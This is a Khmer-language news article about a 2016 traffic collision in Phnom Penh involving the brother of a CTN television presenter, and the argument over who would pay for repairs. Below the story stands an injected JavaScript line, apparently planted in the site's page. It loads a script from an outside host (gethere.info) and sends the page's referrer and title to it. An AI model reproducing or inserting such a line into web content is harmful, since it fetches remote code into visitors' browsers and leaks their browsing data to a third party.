Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

(វីដេអូ) ប្អូនប្រុសពិធីការនីទូរទស្សន៍ CTN កញ្ញាជីជី រយលានសំណាង ជួបគ្រោះថ្នាក់ចរាចរណ៍ តែ….

ភ្នំពេញ ៖នៅវេលាម៉ោង ១និង៤០នាទីយប់រំលងអាធ្រាតឈានចូលថ្ងៃទី ២១ តុលា ២០១៦ នៅតាមបណ្តោយផ្លូវភ្នំពេញ ហាណូយ មុខច្រកចូលបុរី ពិភពថ្មីផ្សារដីហុយ ស្ថិតក្នុងសង្កាត់ភ្នំពេញថ្មី ខណ្ឌសែនសុខ ។

ប្អូនប្រុសពិធីការនីកញ្ញាជីជី បើករថយន្តលឿនបត់ចូលផ្ទះនៅបុរីពិភពថ្មី ផ្សារដីហុយ ត្រូវរថយន្តប្រភេទកូរ៉េដឹកទំនិញ បើកលឿនដែរ ចាប់ហ្វ្រាំងអូសជាង១០ម៉ែត្រទៅបុកពេញទំហឹង បណ្តាលអោយរថយន្តទាំង ២គ្រឿង ខូត ខាតទៅមុខលែងរួច តែសំណាងមិនមានមនុស្សរងរបួសអ្វីនោះទេ។

តាមសាក្សីពីកន្លែងកើតហេតុបានឲដឹងថា នៅមុនពេលកើតហេតុ រថយន្តរបស់ប្អូនកញ្ញាជីជី ម៉ាកកាម៊រី ហាយ ប្រ៊ីត ពណ៍ទឹកមាសពាក់ស្លាកលេខភ្នំពេញ 2X-3335 បើកបរតាមបណ្តោយផ្លូវហាណូទិសដៅពីត្បូងទៅជើង យ៉ាង លឿន ខណៈមកដល់ចំណុចកើតហេតុ រថយន្តមិនបានបង្អង់ល្បឿននិងអត់ស៊ីញ៉ូ ឆ្លងបត់ចូលផ្ទះក្នុងបុរីពិភពថ្មី ស្របគ្នានោះ ក៏មានរថយន្តកូរ៉េដឹកទំនិញពត៍មានខៀវ ពាក់ស្លាកលេខ 1787 ភព2 បើកបរដោយបុរសចំណាស់ម្នាក់តាមផ្លូវហាណូយទិសដៅពីជើងទៅត្បូង ត្រូវទិសដៅចរាចរណ៍ តែក្នុងល្បឿនលឿនដូចគ្នា បណ្តាលអោយវ៉ាកអ៊ើ ចាប់ហ្វ្រាំងអូសកង់ជាង១០ម៉ែត្រ ទៅបុកផ្ទប់រថយន្តហាយប្រ៊ីតកំពិតទ្វារនិងវៀតម៉ែត្រចង្កូតកង់ផ្នែកខាងស្តាំធ្ងន់ធ្ងរ រីរថយន្តកូរ៉េផុងកាងដែកខាងមុខ ចំណែកឯអ្នកបើកបរទាំង២ មិនមាននរណាម្នាក់រងរបួសនោះទេ ។

ក្រោយពេលកើតហេតុ គេឃើញមានវត្តមានកញ្ញាជីជី បងស្រី និងបងប្អូនចេញមុខមកដោះស្រាយ សុំអោយខាងរថយន្តកូរ៉េចេញថ្លៃជួសជុលទាំងស្រុង ពោលគឺយករថយន្តទៅជួសជុលអោយដូចដើម តែត្រូវខាងរថយន្តកូរ៉េបដិសេធ ព្រោះគាត់ជាអ្នកបើកបងជាកម្មករគេដែរគាត់មានលទ្ធភាពឯណាសង ហើយគាត់ក៏បានទាក់ទងទៅក្រុមហ៊ុនហើយដែរ តែតំណាងក្រុមហ៊ុននៅខេត្តឆ្ងាយពិបាកក្នុងការធ្វើដំណើរមកទាំងយប់ តែខាងកញ្ញាជីជីមិនព្រមដោយអោយចេញមកដោះស្រាយសងទាំងយប់ ទើបជជែកវែកញ៉ែកគ្នា បែកផ្សែង ចុងក្រោយទើបបានអោយសមត្ថកិច្ចជំនាញវាស់វែងនាំយករថយន្តទាំង២គ្រឿងទៅរក្សាទុកនៅអធិការដ្ឋាននគរបាល ខណ្ឌសែនសុខដើម្បីធ្វើការដោះស្រាយគ្នានៅពេលព្រឹកបន្តទៀត៕

160326144404_03s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More